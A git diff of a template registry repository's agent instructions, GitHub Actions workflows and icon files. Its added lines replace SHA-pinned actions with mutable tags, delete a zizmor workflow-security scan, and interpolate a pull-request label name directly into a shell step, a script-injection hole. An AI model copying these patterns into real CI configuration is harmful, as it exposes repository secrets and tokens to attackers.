- `bun run shellcheck` passes if the template includes shell scripts
- README documents prerequisites and architecture
- Shell scripts handle errors gracefully (`|| echo "Warning..."` for non-fatal failures). If a script sources external files (`$HOME/.bashrc`, `/etc/bashrc`, `/etc/os-release`), the `source` must come before `set -u`; CI enforces this ordering.
- No hardcoded values that should be configurable via variables or parameters
- Asset and icon paths in frontmatter and Terraform must be relative (e.g. `../../../../.icons/`), not absolute. External hyperlinks to docs or other websites are fine.
-
-## Response to the User
-
-In your response, include:
-
- A ready-to-run push command with real values filled in. Use `-d` to point at the template directory (so it works from the repo root), `-m` for a short description, and `-y` to skip interactive prompts:
-
-```bash
-coder templates push \
-  registry/ \
-  -m "Initial version: <brief description>" \
-  -y < template-name > -d < namespace > /templates/ < template-name > /
-```
-
- If a new namespace was created, remind the user to fill out the namespace README (`display_name`, `bio`, `status`, `github`, etc.) and replace the placeholder avatar. Note that this is only needed if they plan to contribute to the registry.
- If any icons were referenced but not found, list them and note they need to be sourced and added to both this repo's `.icons/` directory and the `coder/coder` repo at `site/static/icon/`.
- A note that to contribute the template to the public registry, they can open a pull request to <https://github.com/coder/registry>.
@@ -1 +0,0 @@
-../.agents/skills
@@ -11,7 +11,7 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@v6

      - name: Run check.sh
        run: |
@@ -1,7 +1,7 @@
 name: CI
 on:
  pull_request:
-
+    branches: [main]
 # Cancel in-progress runs for pull requests when developers push new changes
 concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
@@ -12,9 +12,9 @@ jobs:
    runs-on: ubuntu-latest
    steps:
      - name: Check out code
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@v6
      - name: Detect changed files
-        uses: dorny/paths-filter@fbd0ab8f3e69293af611ebaee6363fc25e6d187d # v4.0.1
+        uses: dorny/paths-filter@v3
        id: filter
        with:
          list-files: shell
@@ -37,9 +37,9 @@ jobs:
            all:
              - '**'
      - name: Set up Terraform
-        uses: coder/coder/.github/actions/setup-tf@f7650296ceb9b020c79cd525ac7bd3c7f252ae1d # v2.31.6
+        uses: coder/coder/.github/actions/setup-tf@main
      - name: Set up Bun
-        uses: oven-sh/setup-bun@0c5077e51419868618aeaa5fe8019c62421857d6 # v2
+        uses: oven-sh/setup-bun@v2
        with:
          # We're using the latest version of Bun for now, but it might be worth
          # reconsidering. They've pushed breaking changes in patch releases
@@ -80,20 +80,20 @@ jobs:
    runs-on: ubuntu-latest
    steps:
      - name: Check out code
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@v6
      - name: Install Bun
-        uses: oven-sh/setup-bun@0c5077e51419868618aeaa5fe8019c62421857d6 # v2
+        uses: oven-sh/setup-bun@v2
        with:
          bun-version: latest
      # Need Terraform for its formatter
      - name: Install Terraform
-        uses: coder/coder/.github/actions/setup-tf@f7650296ceb9b020c79cd525ac7bd3c7f252ae1d # v2.31.6
+        uses: coder/coder/.github/actions/setup-tf@main
      - name: Install dependencies
        run: bun install
      - name: Validate formatting
        run: bun fmt:ci
      - name: Check for typos
-        uses: crate-ci/typos@631208b7aac2daa8b707f55e7331f9112b0e062d # v1.44.0
+        uses: crate-ci/typos@v1.42.0
        with:
          config: .github/typos.toml
  validate-readme-files:
@@ -104,9 +104,9 @@ jobs:
    needs: validate-style
    steps:
      - name: Check out code
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@v6
      - name: Set up Go
-        uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6
+        uses: actions/setup-go@v6
        with:
          go-version: "1.24.0"
      - name: Validate contributors
@@ -28,7 +28,7 @@ jobs:

    steps:
      - name: Checkout code
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@v6
      - name: Authenticate with Google Cloud
        uses: google-github-actions/auth@7c6bc770dae815cd3e89ee6cdf493a5fab2cc093
        with:
@@ -14,11 +14,11 @@ jobs:
    name: lint
    runs-on: ubuntu-latest
    steps:
-      - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
-      - uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6
+      - uses: actions/checkout@v6
+      - uses: actions/setup-go@v6
        with:
          go-version: stable
      - name: golangci-lint
-        uses: golangci/golangci-lint-action@1e7e51e771db61008b38414a730f564565cf7c20 # v9
+        uses: golangci/golangci-lint-action@v9
        with:
          version: v2.1
@@ -14,7 +14,7 @@ jobs:

    steps:
      - name: Checkout code
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@v6
        with:
          fetch-depth: 0
          persist-credentials: false
@@ -89,9 +89,9 @@ jobs:

          for sha in $MODULE_COMMIT_SHAS; do
            SHORT_SHA=${sha:0:7}
-
+            
            COMMIT_LINES=$(echo "$FULL_CHANGELOG" | grep -E "$SHORT_SHA|$(git log --format='%s' -n 1 $sha)" || true)
-
+            
            if [ -n "$COMMIT_LINES" ]; then
              FILTERED_CHANGELOG="${FILTERED_CHANGELOG}${COMMIT_LINES}\n"
            else
@@ -20,28 +20,26 @@ jobs:
      issues: write
    steps:
      - name: Checkout code
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+        uses: actions/checkout@v6
        with:
          fetch-depth: 0
          token: ${{ secrets.GITHUB_TOKEN }}

      - name: Set up Bun
-        uses: oven-sh/setup-bun@0c5077e51419868618aeaa5fe8019c62421857d6 # v2
+        uses: oven-sh/setup-bun@v2
        with:
          bun-version: latest

      - name: Set up Terraform
-        uses: coder/coder/.github/actions/setup-tf@f7650296ceb9b020c79cd525ac7bd3c7f252ae1d # v2.31.6
+        uses: coder/coder/.github/actions/setup-tf@main

      - name: Install dependencies
        run: bun install

      - name: Extract bump type from label
-        env:
-          LABEL_NAME: ${{ github.event.label.name }}
        id: bump-type
        run: |
-          case "$LABEL_NAME" in
+          case "${{ github.event.label.name }}" in
            "version:patch")
              echo "type=patch" >> $GITHUB_OUTPUT
              ;;
@@ -52,7 +50,7 @@ jobs:
              echo "type=major" >> $GITHUB_OUTPUT
              ;;
            *)
-              echo "Invalid version label: ${LABEL_NAME}"
+              echo "Invalid version label: ${{ github.event.label.name }}"
              exit 1
              ;;
          esac
@@ -62,7 +60,7 @@ jobs:

      - name: Comment on PR - Version bump required
        if: failure()
-        uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+        uses: actions/github-script@v8
        with:
          github-token: ${{ secrets.GITHUB_TOKEN }}
          script: |
@@ -1,55 +0,0 @@
-name: GitHub Actions Security Analysis (zizmor)
-
-on:
-  pull_request:
-    branches: ["**"]
-    paths:
-      - ".github/workflows/**"
-  push:
-    branches: ["main"]
-    paths:
-      - ".github/workflows/**"
-  workflow_dispatch:
-
-permissions: {}
-
-jobs:
-  zizmor_pr_blocking:
-    if: github.event_name == 'pull_request'
-    runs-on: ubuntu-latest
-    permissions:
-      contents: read
-      actions: read
-    steps:
-      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
-        with:
-          persist-credentials: false
-
-      - name: Run zizmor (blocking, HIGH only)
-        uses: zizmorcore/zizmor-action@71321a20a9ded102f6e9ce5718a2fcec2c4f70d8 # v0.5.2
-        with:
-          advanced-security: false
-          annotations: true
-          min-severity: high
-          inputs: |
-            .github/workflows
-
-  zizmor_main_sarif:
-    if: github.event_name != 'pull_request'
-    runs-on: ubuntu-latest
-    permissions:
-      security-events: write
-      contents: read
-      actions: read
-    steps:
-      - name: Checkout repository
-        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
-        with:
-          persist-credentials: false
-
-      - name: Run zizmor (SARIF)
-        uses: zizmorcore/zizmor-action@71321a20a9ded102f6e9ce5718a2fcec2c4f70d8 # v0.5.2
-        with:
-          inputs: |
-            .github/workflows
@@ -1 +0,0 @@
-<svg role="img" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><title>1Password</title><circle cx="12" cy="12" r="12" fill="#0572EC"/><path fill="#fff" d="M11.105 4.864h1.788c.484 0 .729.002.914.096a.86.86 0 0 1 .377.377c.094.185.095.428.095.912v6.016c0 .12 0 .182-.015.238a.427.427 0 0 1-.067.137.923.923 0 0 1-.174.162l-.695.564c-.113.092-.17.138-.191.194a.216.216 0 0 0 0 .15c.02.055.078.101.191.193l.695.565c.094.076.14.115.174.162.03.042.053.087.067.137a.936.936 0 0 1 .015.238v2.746c0 .484-.001.727-.095.912a.86.86 0 0 1-.377.377c-.185.094-.43.096-.914.096h-1.788c-.484 0-.726-.002-.912-.096a.86.86 0 0 1-.377-.377c-.094-.185-.095-.428-.095-.912v-6.016c0-.12 0-.182.015-.238a.437.437 0 0 1 .067-.139c.034-.047.08-.083.174-.16l.695-.564c.113-.092.17-.138.191-.194a.216.216 0 0 0 0-.15c-.02-.055-.078-.101-.191-.193l-.695-.565a.92.92 0 0 1-.174-.162.437.437 0 0 1-.067-.139.92.92 0 0 1-.015-.236V6.25c0-.484.001-.727.095-.912a.86.86 0 0 1 .377-.377c.186-.094.428-.096.912-.096z"/></svg>
@@ -1,10 +0,0 @@
-<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 200 200" fill="none">
-  <g fill="#40BE46">
-    <!-- Eye shape -->
-    <path d="M100 40C55 40 20 80 10 100c10 20 45 60 90 60s80-40 90-60c-10-20-45-60-90-60zm0 100c-35 0-63-28-75-40 12-12 40-40 75-40s63 28 75 40c-12 12-40 40-75 40z"/>
-    <!-- Inner circle (magnifying glass lens) -->
-    <path d="M100 72a28 28 0 1 0 0 56 28 28 0 0 0 0-56zm0 44a16 16 0 1 1 0-32 16 16 0 0 1 0 32z"/>
-    <!-- Horizontal line below -->
-    <rect x="25" y="170" width="150" height="12" rx="6"/>
-  </g>
-</svg>
@@ -1,438 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<svg version="1.1" viewBox="0 0 216 256" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
-	<title>Tux</title>
-	<defs id="tux_fx">
-		<linearGradient id="gradient_belly_shadow">
-			<stop offset="0" stop-color="#000000"/>
-			<stop offset="1" stop-color="#000000" stop-opacity="0.25"/>
-		</linearGradient>
-		<linearGradient id="gradient_wing_tip_right_shadow">
-			<stop offset="0"    stop-color="#110800"/>
-			<stop offset="0.59" stop-color="#a65a00" stop-opacity="0.8"/>
-			<stop offset="1"    stop-color="#ff921e" stop-opacity="0"/>
-		</linearGradient>
-		<linearGradient id="gradient_wing_tip_right_glare_1">
-			<stop offset="0" stop-color="#7c7c7c"/>
-			<stop offset="1" stop-color="#7c7c7c" stop-opacity="0.33"/>
-		</linearGradient>
-		<linearGradient id="gradient_wing_tip_right_glare_2">
-			<stop offset="0" stop-color="#7c7c7c"/>
-			<stop offset="1" stop-color="#7c7c7c" stop-opacity="0.33"/>
-		</linearGradient>
-		<linearGradient id="gradient_foot_left_layer_1">
-			<stop offset="0" stop-color="#b98309"/>
-			<stop offset="1" stop-color="#382605"/>
-		</linearGradient>
-		<linearGradient id="gradient_foot_left_glare">
-			<stop offset="0" stop-color="#ebc40c"/>
-			<stop offset="1" stop-color="#ebc40c" stop-opacity="0"/>
-		</linearGradient>
-		<linearGradient id="gradient_foot_right_shadow">
-			<stop offset="0" stop-color="#000000"/>
-			<stop offset="1" stop-color="#000000" stop-opacity="0"/>
-		</linearGradient>
-		<linearGradient id="gradient_foot_right_layer_1">
-			<stop offset="0" stop-color="#3e2a06"/>
-			<stop offset="1" stop-color="#ad780a"/>
-		</linearGradient>
-		<linearGradient id="gradient_foot_right_glare">
-			<stop offset="0" stop-color="#f3cd0c"/>
-			<stop offset="1" stop-color="#f3cd0c" stop-opacity="0"/>
-		</linearGradient>
-		<linearGradient id="gradient_eyeball">
-			<stop offset="0"    stop-color="#fefefc"/>
-			<stop offset="0.75" stop-color="#fefefc"/>
-			<stop offset="1"    stop-color="#d4d4d4"/>
-		</linearGradient>
-		<linearGradient id="gradient_pupil_left_glare">
-			<stop offset="0"    stop-color="#757574" stop-opacity="0"/>
-			<stop offset="0.25" stop-color="#757574"/>
-			<stop offset="0.5"  stop-color="#757574"/>
-			<stop offset="1"    stop-color="#757574" stop-opacity="0"/>
-		</linearGradient>
-		<linearGradient id="gradient_pupil_right_glare_2">
-			<stop offset="0"   stop-color="#949494" stop-opacity="0.39"/>
-			<stop offset="0.5" stop-color="#949494"/>
-			<stop offset="1"   stop-color="#949494" stop-opacity="0.39"/>
-		</linearGradient>
-		<linearGradient id="gradient_eyelid_left">
-			<stop offset="0" stop-color="#c8c8c8"/>
-			<stop offset="1" stop-color="#797978"/>
-		</linearGradient>
-		<linearGradient id="gradient_eyelid_right">
-			<stop offset="0"    stop-color="#747474"/>
-			<stop offset="0.13" stop-color="#8c8c8c"/>
-			<stop offset="0.25" stop-color="#a4a4a4"/>
-			<stop offset="0.5"  stop-color="#d4d4d4"/>
-			<stop offset="0.62" stop-color="#d4d4d4"/>
-			<stop offset="1"    stop-color="#7c7c7c"/>
-		</linearGradient>
-		<linearGradient id="gradient_eyebrow">
-			<stop offset="0"    stop-color="#646464" stop-opacity="0"/>
-			<stop offset="0.31" stop-color="#646464" stop-opacity="0.58"/>
-			<stop offset="0.47" stop-color="#646464"/>
-			<stop offset="0.73" stop-color="#646464" stop-opacity="0.26"/>
-			<stop offset="1"    stop-color="#646464" stop-opacity="0"/>
-		</linearGradient>
-		<linearGradient id="gradient_beak_base">
-			<stop offset="0"    stop-color="#020204"/>
-			<stop offset="0.73" stop-color="#020204"/>
-			<stop offset="1"    stop-color="#5c5c5c"/>
-		</linearGradient>
-		<linearGradient id="gradient_mandible_lower">
-			<stop offset="0"    stop-color="#d2940a"/>
-			<stop offset="0.75" stop-color="#d89c08"/>
-			<stop offset="0.87" stop-color="#b67e07"/>
-			<stop offset="1"    stop-color="#946106"/>
-		</linearGradient>
-		<linearGradient id="gradient_mandible_upper">
-			<stop offset="0"    stop-color="#ad780a"/>
-			<stop offset="0.12" stop-color="#d89e08"/>
-			<stop offset="0.25" stop-color="#edb80b"/>
-			<stop offset="0.39" stop-color="#ebc80d"/>
-			<stop offset="0.53" stop-color="#f5d838"/>
-			<stop offset="0.77" stop-color="#f6d811"/>
-			<stop offset="1"    stop-color="#f5cd31"/>
-		</linearGradient>
-		<linearGradient id="gradient_nares">
-			<stop offset="0"    stop-color="#3a2903"/>
-			<stop offset="0.55" stop-color="#735208"/>
-			<stop offset="1"    stop-color="#ac8c04"/>
-		</linearGradient>
-		<linearGradient id="gradient_beak_corner">
-			<stop offset="0" stop-color="#f5ce2d"/>
-			<stop offset="1" stop-color="#d79b08"/>
-		</linearGradient>
-		<radialGradient id="fill_belly_shadow_left" href="#gradient_belly_shadow" xlink:href="#gradient_belly_shadow"
-			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(61.18,121.19) scale(19,18)"/>
-		<radialGradient id="fill_belly_shadow_right" href="#gradient_belly_shadow" xlink:href="#gradient_belly_shadow"
-			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(125.74,131.6) scale(23.6,18)"/>
-		<radialGradient id="fill_belly_shadow_middle" href="#gradient_belly_shadow" xlink:href="#gradient_belly_shadow"
-			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(94.21,127.47) scale(9.35,10)"/>
-		<linearGradient id="fill_foot_left_base" href="#gradient_foot_left_layer_1" xlink:href="#gradient_foot_left_layer_1"
-			gradientUnits="userSpaceOnUse" x1="23.18" y1="193.01" x2="64.31" y2="262.02"/>
-		<linearGradient id="fill_foot_left_glare" href="#gradient_foot_left_glare" xlink:href="#gradient_foot_left_glare"
-			gradientUnits="userSpaceOnUse" x1="64.47" y1="210.83" x2="77.41" y2="235.21"/>
-		<linearGradient id="fill_foot_right_shadow" href="#gradient_foot_right_shadow" xlink:href="#gradient_foot_right_shadow"
-			gradientUnits="userSpaceOnUse" x1="146.93" y1="211.96" x2="150.2" y2="235.73"/>
-		<linearGradient id="fill_foot_right_base" href="#gradient_foot_right_layer_1" xlink:href="#gradient_foot_right_layer_1"
-			gradientUnits="userSpaceOnUse" x1="151.5" y1="253.02" x2="192.94" y2="185.84"/>
-		<linearGradient id="fill_foot_right_glare" href="#gradient_foot_right_glare" xlink:href="#gradient_foot_right_glare"
-			gradientUnits="userSpaceOnUse" x1="162.81" y1="180.67" x2="161.59" y2="191.64"/>
-		<radialGradient id="fill_wing_tip_right_shadow_lower" href="#gradient_wing_tip_right_shadow" xlink:href="#gradient_wing_tip_right_shadow"
-			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(169.71,194.53) rotate(15) scale(19.66,20.64)"/>
-		<radialGradient id="fill_wing_tip_right_shadow_upper" href="#gradient_wing_tip_right_shadow" xlink:href="#gradient_wing_tip_right_shadow"
-			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(169.71,189.89) rotate(-2.42) scale(19.74,14.86)"/>
-		<radialGradient id="fill_wing_tip_right_glare_1" href="#gradient_wing_tip_right_glare_1" xlink:href="#gradient_wing_tip_right_glare_1"
-			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(184.65,176.62) rotate(23.5) scale(6.95,3.21)"/>
-		<linearGradient id="fill_wing_tip_right_glare_2" href="#gradient_wing_tip_right_glare_2" xlink:href="#gradient_wing_tip_right_glare_2"
-			gradientUnits="userSpaceOnUse" x1="165.69" y1="173.58" x2="168.27" y2="173.47"/>
-		<radialGradient id="fill_eyeball_left" href="#gradient_eyeball" xlink:href="#gradient_eyeball"
-			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(86.49,51.41) rotate(-0.6) scale(10.24,15.68)"/>
-		<linearGradient id="fill_pupil_left_glare" href="#gradient_pupil_left_glare" xlink:href="#gradient_pupil_left_glare"
-			gradientUnits="userSpaceOnUse" x1="84.29" y1="46.64" x2="89.32" y2="55.63"/>
-		<radialGradient id="fill_eyelid_left" href="#gradient_eyelid_left" xlink:href="#gradient_eyelid_left"
-			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(84.89,43.74) rotate(-9.35) scale(6.25,5.77)"/>
-		<linearGradient id="fill_eyebrow_left" href="#gradient_eyebrow" xlink:href="#gradient_eyebrow"
-			gradientUnits="userSpaceOnUse" x1="83.59" y1="32.51" x2="94.48" y2="43.63"/>
-		<radialGradient id="fill_eyeball_right" href="#gradient_eyeball" xlink:href="#gradient_eyeball"
-			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(118.06,51.41) rotate(-1.8) scale(13.64,15.68)"/>
-		<linearGradient id="fill_pupil_right_glare" href="#gradient_pupil_right_glare_2" xlink:href="#gradient_pupil_right_glare_2"
-			gradientUnits="userSpaceOnUse" x1="117.87" y1="47.25" x2="123.66" y2="54.11"/>
-		<linearGradient id="fill_eyelid_right" href="#gradient_eyelid_right" xlink:href="#gradient_eyelid_right"
-			gradientUnits="userSpaceOnUse" x1="112.9" y1="36.23" x2="131.32" y2="47.01"/>
-		<linearGradient id="fill_eyebrow_right" href="#gradient_eyebrow" xlink:href="#gradient_eyebrow"
-			gradientUnits="userSpaceOnUse" x1="119.16" y1="31.56" x2="131.42" y2="43.14"/>
-		<radialGradient id="fill_beak_base" href="#gradient_beak_base" xlink:href="#gradient_beak_base"
-			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(97.64,60.12) rotate(-36) scale(11.44,10.38)"/>
-		<radialGradient id="fill_mandible_lower_base" href="#gradient_mandible_lower" xlink:href="#gradient_mandible_lower"
-			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(109.77,70.61) rotate(-22.4) scale(27.15,19.07)"/>
-		<linearGradient id="fill_mandible_upper_base" href="#gradient_mandible_upper" xlink:href="#gradient_mandible_upper"
-			gradientUnits="userSpaceOnUse" x1="78.09" y1="69.26" x2="126.77" y2="68.88"/>
-		<radialGradient id="fill_naris_left" href="#gradient_nares" xlink:href="#gradient_nares"
-			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(92.11,59.88) scale(1.32,1.42)"/>
-		<radialGradient id="fill_naris_right" href="#gradient_nares" xlink:href="#gradient_nares"
-			gradientUnits="userSpaceOnUse" cx="0" cy="0" r="1" gradientTransform="translate(104.65,59.7) scale(2.78,1.62)"/>
-		<linearGradient id="fill_beak_corner" href="#gradient_beak_corner" xlink:href="#gradient_beak_corner"
-			gradientUnits="userSpaceOnUse" x1="126.74" y1="67.49" x2="126.74" y2="71.09"/>
-		<filter id="blur_belly_shadow_left">
-			<feGaussianBlur stdDeviation="0.64 0.55"/>
-		</filter>
-		<filter id="blur_belly_shadow_right">
-			<feGaussianBlur stdDeviation="0.98"/>
-		</filter>
-		<filter id="blur_belly_shadow_middle">
-			<feGaussianBlur stdDeviation="0.68"/>
-		</filter>
-		<filter id="blur_belly_shadow_lower" x="-0.8" width="2.6" y="-0.2" height="1.4">
-			<feGaussianBlur stdDeviation="1.25"/>
-		</filter>
-		<filter id="blur_belly_glare" x="-0.8" width="2.6" y="-0.5" height="2">
-			<feGaussianBlur stdDeviation="1.78 2.19"/>
-		</filter>
-		<filter id="blur_head_glare" x="-0.3" width="1.6" y="-0.3" height="1.6">
-			<feGaussianBlur stdDeviation="1.73"/>
-		</filter>
-		<filter id="blur_neck_glare" x="-0.2" width="1.4" y="-0.2" height="1.4">
-			<feGaussianBlur stdDeviation="0.78"/>
-		</filter>
-		<filter id="blur_wing_left_glare" x="-0.2" width="1.4" y="-0.2" height="1.4">
-			<feGaussianBlur stdDeviation="0.98"/>
-		</filter>
-		<filter id="blur_wing_right_glare" x="-0.2" width="1.4" y="-0.2" height="1.4">
-			<feGaussianBlur stdDeviation="1.19 1.17"/>
-		</filter>
-		<filter id="blur_foot_left_layer_1" x="-0.2" width="1.4" y="-0.2" height="1.4">
-			<feGaussianBlur stdDeviation="3.38"/>
-		</filter>
-		<filter id="blur_foot_left_layer_2">
-			<feGaussianBlur stdDeviation="2.1 2.06"/>
-		</filter>
-		<filter id="blur_foot_left_glare">
-			<feGaussianBlur stdDeviation="0.32"/>
-		</filter>
-		<filter id="blur_foot_right_shadow">
-			<feGaussianBlur stdDeviation="1.95 1.9"/>
-		</filter>
-		<filter id="blur_foot_right_layer_1" x="-0.2" width="1.4" y="-0.2" height="1.4">
-			<feGaussianBlur stdDeviation="4.12"/>
-		</filter>
-		<filter id="blur_foot_right_layer_2" x="-0.2" width="1.4" y="-0.2" height="1.4">
-			<feGaussianBlur stdDeviation="3.12 3.37"/>
-		</filter>
-		<filter id="blur_foot_right_glare" x="-0.2" width="1.4" y="-0.2" height="1.4">
-			<feGaussianBlur stdDeviation="0.41"/>
-		</filter>
-		<filter id="blur_wing_tip_right_shadow_lower" x="-0.3" width="1.6" y="-0.3" height="1.6">
-			<feGaussianBlur stdDeviation="2.45"/>
-		</filter>
-		<filter id="blur_wing_tip_right_shadow_upper" x="-0.2" width="1.4" y="-0.2" height="1.4">
-			<feGaussianBlur stdDeviation="1.12 0.81"/>
-		</filter>
-		<filter id="blur_wing_tip_right_glare" x="-0.2" width="1.4" y="-0.2" height="1.4">
-			<feGaussianBlur stdDeviation="0.88"/>
-		</filter>
-		<filter id="blur_pupil_left_glare" x="-0.3" width="1.6" y="-0.3" height="1.6">
-			<feGaussianBlur stdDeviation="0.44"/>
-		</filter>
-		<filter id="blur_eyebrow_left">
-			<feGaussianBlur stdDeviation="0.12"/>
-		</filter>
-		<filter id="blur_pupil_right_glare" x="-0.2" width="1.4" y="-0.2" height="1.4">
-			<feGaussianBlur stdDeviation="0.45"/>
-		</filter>
-		<filter id="blur_eyebrow_right">
-			<feGaussianBlur stdDeviation="0.13"/>
-		</filter>
-		<filter id="blur_beak_shadow_lower" x="-0.2" width="1.4" y="-0.2" height="1.4">
-			<feGaussianBlur stdDeviation="1.75"/>
-		</filter>
-		<filter id="blur_beak_shadow_upper">
-			<feGaussianBlur stdDeviation="0.8 0.74"/>
-		</filter>
-		<filter id="blur_mandible_lower_glare" x="-0.2" width="1.4" y="-0.2" height="1.4">
-			<feGaussianBlur stdDeviation="0.77"/>
-		</filter>
-		<filter id="blur_mandible_upper_shadow">
-			<feGaussianBlur stdDeviation="0.65"/>
-		</filter>
-		<filter id="blur_mandible_upper_glare" x="-0.2" width="1.4" y="-0.2" height="1.4">
-			<feGaussianBlur stdDeviation="0.73"/>
-		</filter>
-		<filter id="blur_naris_left" x="-0.2" width="1.4" y="-0.2" height="1.4">
-			<feGaussianBlur stdDeviation="0.1"/>
-		</filter>
-		<filter id="blur_naris_right">
-			<feGaussianBlur stdDeviation="0.1"/>
-		</filter>
-		<filter id="blur_beak_corner" x="-0.2" width="1.4" y="-0.2" height="1.4">
-			<feGaussianBlur stdDeviation="0.23"/>
-		</filter>
-		<clipPath id="clip_body">
-			<use href="#body_base" xlink:href="#body_base"/>
-		</clipPath>
-		<clipPath id="clip_wing_left">
-			<use href="#wing_left_base" xlink:href="#wing_left_base"/>
-		</clipPath>
-		<clipPath id="clip_wing_right">
-			<use href="#wing_right_base" xlink:href="#wing_right_base"/>
-		</clipPath>
-		<clipPath id="clip_foot_left">
-			<use href="#foot_left_base" xlink:href="#foot_left_base"/>
-		</clipPath>
-		<clipPath id="clip_foot_right">
-			<use href="#foot_right_base" xlink:href="#foot_right_base"/>
-		</clipPath>
-		<clipPath id="clip_wing_tip_right">
-			<use href="#wing_tip_right_base" xlink:href="#wing_tip_right_base"/>
-		</clipPath>
-		<clipPath id="clip_eye_left">
-			<use href="#eyeball_left" xlink:href="#eyeball_left"/>
-		</clipPath>
-		<clipPath id="clip_pupil_left">
-			<use href="#pupil_left_base" xlink:href="#pupil_left_base"/>
-		</clipPath>
-		<clipPath id="clip_eye_right">
-			<use href="#eyeball_right" xlink:href="#eyeball_right"/>
-		</clipPath>
-		<clipPath id="clip_pupil_right">
-			<use href="#pupil_right_base" xlink:href="#pupil_right_base"/>
-		</clipPath>
-		<clipPath id="clip_mandible_lower">
-			<use href="#mandible_lower_base" xlink:href="#mandible_lower_base"/>
-		</clipPath>
-		<clipPath id="clip_mandible_upper">
-			<use href="#mandible_upper_base" xlink:href="#mandible_upper_base"/>
-		</clipPath>
-		<clipPath id="clip_beak">
-			<use href="#mandible_lower_base" xlink:href="#mandible_lower_base"/>
-			<use href="#mandible_upper_base" xlink:href="#mandible_upper_base"/>
-		</clipPath>
-	</defs>
-	<g id="tux">
-		<g id="body">
-			<path id="body_base" fill="#020204"
-				d="m 106.95,0 c -6,0 -12.02,1.18 -17.46,4.12 -5.78,3.11 -10.52,8.09 -13.43,13.97 -2.92,5.88 -4.06,12.16 -4.24,19.08 -0.33,13.14 0.3,26.92 1.29,39.41 0.26,3.8 0.74,6.02 0.25,9.93 -1.62,8.3 -8.88,13.88 -12.76,21.17 -4.27,8.04 -6.07,17.13 -9.29,25.65 -2.95,7.79 -7.09,15.1 -9.88,22.95 -3.91,10.97 -5.08,23.03 -2.5,34.39 1.97,8.66 6.08,16.78 11.62,23.73 -0.8,1.44 -1.58,2.91 -2.4,4.34 -2.57,4.43 -5.71,8.64 -7.17,13.55 -0.73,2.45 -1.02,5.07 -0.55,7.59 0.47,2.52 1.75,4.93 3.75,6.53 1.31,1.04 2.9,1.72 4.53,2.1 1.63,0.37 3.32,0.46 5,0.43 6.37,-0.14 12.55,-2.07 18.71,-3.69 3.66,-0.96 7.34,-1.81 11.03,-2.58 13.14,-2.69 27.8,-1.61 39.99,0.15 4.13,0.63 8.23,1.44 12.29,2.43 6.36,1.54 12.69,3.5 19.23,3.69 1.72,0.05 3.46,-0.03 5.14,-0.4 1.68,-0.38 3.31,-1.06 4.65,-2.13 2.01,-1.6 3.29,-4.02 3.76,-6.54 0.47,-2.52 0.18,-5.15 -0.56,-7.61 -1.48,-4.92 -4.65,-9.11 -7.27,-13.52 -1.04,-1.75 -2,-3.53 -3.03,-5.28 7.9,-8.87 14.26,-19.13 17.94,-30.4 4.01,-12.3 4.75,-25.55 3.06,-38.38 -1.69,-12.83 -5.76,-25.27 -11.11,-37.05 -6.72,-14.76 -12.37,-20.1 -16.47,-33.07 -4.42,-14.02 -0.77,-30.61 -4.06,-43.32 -1.17,-4.32 -3.04,-8.45 -5.45,-12.23 -2.82,-4.43 -6.4,-8.39 -10.65,-11.47 -6.78,-4.92 -15.3,-7.54 -23.96,-7.54 z"/>
-			<path id="belly" fill="#fdfdfb"
